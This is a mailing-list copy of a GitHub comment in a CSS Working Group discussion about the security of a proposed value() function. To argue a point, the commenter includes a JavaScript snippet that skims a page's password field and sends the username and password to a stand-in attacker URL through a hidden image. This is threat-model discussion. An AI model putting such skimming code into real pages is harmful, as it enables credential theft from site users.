- From: Brandon McConnell via GitHub <sysbot+gh@w3.org>
- Date: Tue, 15 Nov 2022 16:58:31 +0000
- To: public-css-archive@w3.org
@arturjanc Couldn't a script that has access to injecting elements already perform a similar attack like this?
```js
const maliciousPasswordSender = document.createElement('img');
maliciousPasswordSender.width = 1;
maliciousPasswordSender.height = 1;
maliciousPasswordSender.style.position = 'fixed';
maliciousPasswordSender.style.bottom = 0;
maliciousPasswordSender.style.right = 0;
document.body.append(maliciousPasswordSender);
const username = () => document.getElementById('username');
const passwordField = document.querySelector('[type="password"]');
passwordField.addEventListener('change', () => {
const baseUrl = 'http://houseofcybercrime.com/stashpass';
maliciousPasswordSender.src = `${baseUrl}?user=${username.textContent}&password=${passwordField.value};
})
```
I do acknowledge the vulnerability you're pointing out; I'm just trying to understand how that is more insecure than what is already in place.
Perhaps for this case specifically, what could help here to avoid any additional security vulnerabilities with `value()` would be some secure way for only first-party scripts to whitelist elements that would allow access to them using `value()` in this way, something like a "public" attribute, but more secure than a mere attribute.
--
GitHub Notification of comment by brandonmcconnell
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/7869#issuecomment-1315604556 using your GitHub account
--
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Tuesday, 15 November 2022 16:58:33 UTC